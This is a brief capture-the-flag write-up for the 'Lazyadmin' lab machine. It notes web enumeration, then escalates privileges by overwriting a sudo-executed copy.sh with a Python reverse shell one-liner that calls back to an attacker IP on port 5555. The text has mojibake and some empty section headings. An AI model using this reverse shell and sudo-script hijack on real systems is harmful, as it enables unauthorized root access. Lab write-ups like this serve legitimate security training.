Lazyadmin
Lazyadmin
Lazyadmin
π Enumeration & MD5 Decrypting
π΅οΈ I found several URLs:
I found several URLs:

http://10.49.130.161/content/as/
π΅οΈ Executing Reverse Shell
β‘ Script Hijacking & Privilege Escalation
π‘ I explored the system further: 
We can run backup.pl with sudo without a password. I checked the content of backup.pl using cat: 
β‘ Since it runs with root privileges, we can modify the copy.sh script it executes: 
I tried nc but it failed, so I used Python instead:
1
echo "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.49.111.180\",5555));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty;pty.spawn(\"sh\")'" > /etc/copy.sh
Then I executed the Perl script:
1
sudo /usr/bin/perl /home/itguy/backup.pl
This post is licensed under CC BY 4.0 by the author.








